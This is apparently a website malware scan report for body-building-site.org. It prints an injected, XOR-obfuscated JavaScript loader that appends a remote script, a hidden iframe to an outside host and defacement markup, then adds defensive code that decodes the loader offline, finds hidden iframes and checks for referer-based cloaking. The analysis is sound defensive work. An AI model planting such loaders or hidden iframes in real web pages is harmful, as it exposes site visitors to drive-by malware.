Scanned pages/files
Request | Server response | Status |
http://body-building-site.org/ | 200 OK Content-Length: 114709 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below):
function vdch() {
  if (document.all.length > 3) {
    // eight "colour" values carry a URL, XOR-obfuscated one byte at a time
    var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');
    var dchid = "";
    for (j=0;j<t.length;j++) {
      var c_rgb = t[j];
      for (i=1;i<7;i++) {
        var c_clr = c_rgb.substr(i++,2);
        if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i);
      }
    }
    // the decoded string becomes the src of a script element appended to the page
    var dch = document.createElement("script");
    dch.id = "dchid";
    dch.src = dchid;
    document.all[3].appendChild(dch);
  } else {
    setTimeout("vdch()",500);   // DOM not populated yet, retry
  }
}
setTimeout("vdch()",500);
Antivirus reports:
Hidden iFrame found. The same iFrame was found in 7 websites.
size: 2x12  style: hidden  src: http://jl.chura.pl/rc/
<iframe src="http://jl.chura.pl/rc/" style="display:none" width="2" height="12">
Deface/Content modification. The following signature was found: Hacked by Dejoui
...[50181 bytes skipped]... p;rkey3=&target=_blank&orientation=vertical&desc_len=170&order_by=random&talign=left&tid=&desc_bold=normal&title_bold=bold&isCloak=no&CloakID=www.your_link.com&output=js'></script> </td> </tr> </table> <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>Hacked by Dejoui</title><link href="http://xcruzz.blogspot.com/favicon.ico" rel="SHORTCUT ICON"><meta content="Hacked by Dejoui" name="description"><meta dejoui"="" dejoui,="" by="" hacked="" ,="" content="Hacked by dejoui" name="keywords"><br><div><a href="javascript:void(0)" onclick="window.open('http://mourouj.org');window.open('http://mourouj.org')"><img src="http://www.upislam.com/images/06398466376000619610.jpg" height="447" width="601">& ...[76502 bytes skipped]...
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6911 Content-Type: text/javascript | clean |
http://affiliateadrotator.com/jquery-latest.js | 200 OK Content-Length: 72191 Content-Type: application/x-javascript | clean |
http://affiliateadrotator.com/ads.js | 200 OK Content-Length: 1615 Content-Type: application/x-javascript | clean |
http://www.cbadrotator-feed.com/feeds2/gen.php?CID=<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <HaCker By HaCkBoy </title> <meta name="keywords" content="HaCkBoy"> <meta name="description" content="HaCkBoy"> </head> </head> <body bgcolor=" | 200 OK Content-Length: 3115 Content-Type: text/html | clean |
http://www.cbadrotator-feed.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
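The loader and the iframe flagged in the first row, taken apart statically. This is an added example, not code from the report or from the scanner: decodeColourLoader() reproduces the XOR scheme used by vdch() with the colour table copied from the row above, and findHiddenIframes() applies the hidden/tiny-iframe heuristic the report describes to a constructed sample page. The benign iframe URL and the 20-pixel size threshold are assumptions, not values from the report.

```javascript
// Added example (not code from the scan report or the scanner): static
// analysis of the two indicators flagged for http://body-building-site.org/.
//
// decodeColourLoader() replays the injected vdch() decoding without running
// it. In the loader, the inner loop reads two hex digits with
// c_rgb.substr(i++, 2) and XORs the byte with i *after* that post-increment,
// and the loop header then increments i again. So for each '#rrggbb' entry
// the pairs at offsets 1, 3, 5 are XORed with keys 2, 4, 6, and a pair equal
// to "00" is skipped. The result is the src of the <script> the loader adds.
//
// findHiddenIframes() flags iframes that are display:none / visibility:hidden
// or have a tiny width or height, the pattern in the report (2x12, hidden).

// Colour table copied verbatim from the injected script in the report.
const LOADER_COLOURS = ['#6a7072', '#723e29', '#2d7371', '#752a62',
                        '#637d65', '#6d2a60', '#702b63', '#7a7029'];

function decodeColourLoader(colours) {
  let decoded = '';
  for (const colour of colours) {
    for (let pos = 1; pos < 7; pos += 2) {      // offsets 1, 3, 5 of '#rrggbb'
      const pair = colour.slice(pos, pos + 2);
      const key = pos + 1;                        // i after substr(i++, 2): 2, 4, 6
      if (pair !== '00') decoded += String.fromCharCode(parseInt(pair, 16) ^ key);
    }
  }
  return decoded;
}

// Attribute parser for one tag; handles double-, single- and unquoted values.
const ATTR_RE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

function parseAttrs(tag) {
  const attrs = {};
  for (const m of tag.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// maxDim is an assumed threshold: anything at or below it is "tiny".
function findHiddenIframes(html, maxDim = 20) {
  const hits = [];
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const a = parseAttrs(m[0]);
    const style = (a.style || '').replace(/\s+/g, '').toLowerCase();
    const width = parseInt(a.width, 10);
    const height = parseInt(a.height, 10);
    const hidden = /display:none|visibility:hidden/.test(style);
    const tiny = (width <= maxDim) || (height <= maxDim);   // NaN compares false
    if (hidden || tiny) hits.push({ src: a.src || '', hidden, tiny, width, height });
  }
  return hits;
}

// Constructed sample page (not the real page body): the iframe quoted in the
// report plus a benign, full-size iframe that must not be flagged.
const SAMPLE_HTML = `
<iframe src="http://jl.chura.pl/rc/" style="display:none" width="2" height="12"></iframe>
<iframe src="https://example.com/embed/video" width="560" height="315"></iframe>
`;

console.log('loader decodes to:', decodeColourLoader(LOADER_COLOURS));
console.log('hidden iframes:', findHiddenIframes(SAMPLE_HTML));
```

Run it with node. The colour table decodes to http://www.dayco.fr/ext/, which is the src that vdch() assigns to the script element it appends to document.all[3]; the report does not show what that URL served, so treat it as an indicator to pivot on, not as a verdict on the host. The decoding is done offline and never loads the URL, which is the point: reproduce the arithmetic, do not run the loader.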
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: body-building-site.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Oct 2014 19:29:34 GMT
Server: nginx/1.6.2
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: body-building-site.org
Referer: http://www.google.com/search?q=body-building-site.org
Result:
The response is the same as for the first query. No suspicious redirects were found.
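What the two-query check above actually compares, as an added example (not the scanner's code): compareResponses() takes the plain and the search-engine-referred responses and reports redirect targets, whether in the status line or hidden in the body, that appear only in the second one and point off-site; probeCloaking() fetches that pair with the same Referer the report used. The responses embedded in the block are constructed, the landing URL is a placeholder, and Node 18+ global fetch is an assumption for the live probe.

```javascript
// Added example (not the scanner's code): the comparison behind the
// "Malicious Redirects" check. The site is requested twice, once plainly and
// once with a search-engine Referer, and the second response is inspected for
// redirect behaviour the first does not show. A response is a plain
// {status, headers, body} object so the comparison runs offline;
// probeCloaking() builds those objects with whatever fetch function it is
// given (Node 18+ global fetch by default; an assumption, not from the report).

const ORIGIN = 'http://body-building-site.org/';
const SEARCH_REFERER = 'http://www.google.com/search?q=body-building-site.org';

// Redirects that cloaked pages hide in a 200 body rather than in the status.
const BODY_REDIRECT_RE = [
  /<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]*url\s*=\s*([^"'>\s;]+)/i,
  /\blocation(?:\.href)?\s*=\s*["']([^"']+)["']/i,
  /location\.replace\(\s*["']([^"']+)["']\s*\)/i,
];

function redirectTargets(resp) {
  const targets = [];
  const loc = resp.headers && resp.headers.location;
  if (resp.status >= 300 && resp.status < 400 && loc) targets.push(loc);
  for (const re of BODY_REDIRECT_RE) {
    const m = resp.body.match(re);
    if (m) targets.push(m[1]);
  }
  return targets;
}

function sameHost(target, base) {
  try { return new URL(target, base).host === new URL(base).host; }
  catch { return false; }
}

// Off-site redirect targets that appear only in the search-engine response
// are the cloaking pattern the check looks for; an on-site 302 is not.
function compareResponses(normal, fromSearch, base = ORIGIN) {
  const baseline = new Set(redirectTargets(normal));
  const onlyOnSearch = redirectTargets(fromSearch).filter(t => !baseline.has(t));
  const offSite = onlyOnSearch.filter(t => !sameHost(t, base));
  return {
    suspicious: offSite.length > 0,
    statusChanged: normal.status !== fromSearch.status,
    redirects: offSite,
  };
}

// Live probe: redirect: 'manual' keeps the 3xx and its Location visible.
async function probeCloaking(url, fetchFn = globalThis.fetch) {
  const get = async (headers) => {
    const r = await fetchFn(url, { headers, redirect: 'manual' });
    return { status: r.status,
             headers: { location: r.headers.get('location') || '' },
             body: await r.text() };
  };
  const normal = await get({});
  const fromSearch = await get({ Referer: SEARCH_REFERER });
  return compareResponses(normal, fromSearch, url);
}

// Constructed responses for an offline run (not captured traffic). The
// baseline mirrors the 200 the report shows for the plain request; the cloaked
// variant adds a JavaScript redirect only search-engine visitors would get.
// example.net is a placeholder landing host.
const CLEAN_RESPONSE = {
  status: 200,
  headers: { location: '' },
  body: '<html><head><title>Body building</title></head><body>...</body></html>',
};
const CLOAKED_RESPONSE = {
  status: 200,
  headers: { location: '' },
  body: '<html><head><script>if(document.referrer.indexOf("google")!=-1){window.location="http://example.net/landing";}</script></head><body>...</body></html>',
};

console.log('plain vs plain  :', compareResponses(CLEAN_RESPONSE, CLEAN_RESPONSE));
console.log('plain vs cloaked:', compareResponses(CLEAN_RESPONSE, CLOAKED_RESPONSE));
```

To probe a live site, call probeCloaking('http://body-building-site.org/') and inspect the returned object; fetching with the Referer is what separates a cloaked redirect from an ordinary one, because the plain request in the report looks clean on its own.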
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=body-building-site.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://body-building-site.org/
Result: body-building-site.org is not infected or malware details are not published yet.